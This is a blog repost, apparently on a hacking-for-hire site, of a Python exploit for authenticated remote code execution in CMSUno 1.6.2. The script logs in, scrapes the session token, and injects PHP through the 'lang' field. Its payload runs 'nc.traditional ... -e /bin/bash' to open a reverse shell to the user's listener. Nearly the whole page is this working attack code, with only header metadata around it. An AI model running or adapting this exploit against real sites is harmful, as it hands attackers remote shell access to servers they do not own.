Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86373035

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.09.30
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://github.com/boiteasite/cmsuno/
# Software Link: https://github.com/boiteasite/cmsuno/
# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
# Version: 1.6.2
# Tested on: Kali Linux 2020.2

import requests
from bs4 import BeautifulSoup
import lxml
import json

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")

login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"

session = requests.Session()
request = session.get(login_url)

# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']

# Login 
body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)

# Get the second unox value
request = session.get(login_url)
unox = soup.find("input",{'name':'unox'})['value']

# Exploit
header = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"*/",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Origin": login_url,
"Connection": "close",
"Referer": login_url
}

payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)

while True:
    body = 'action=sauvePass&unox={}&user0=&pass0=&user=&pass=&lang={}'.format(unox,payload)
    session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
    request = session.get(login_url)
    text = request.text
    soup = BeautifulSoup(text,"lxml")
    script = soup.findAll('script')[1].string
    data = script.split("Unox='")[1]
    unox = data.split("',")[0]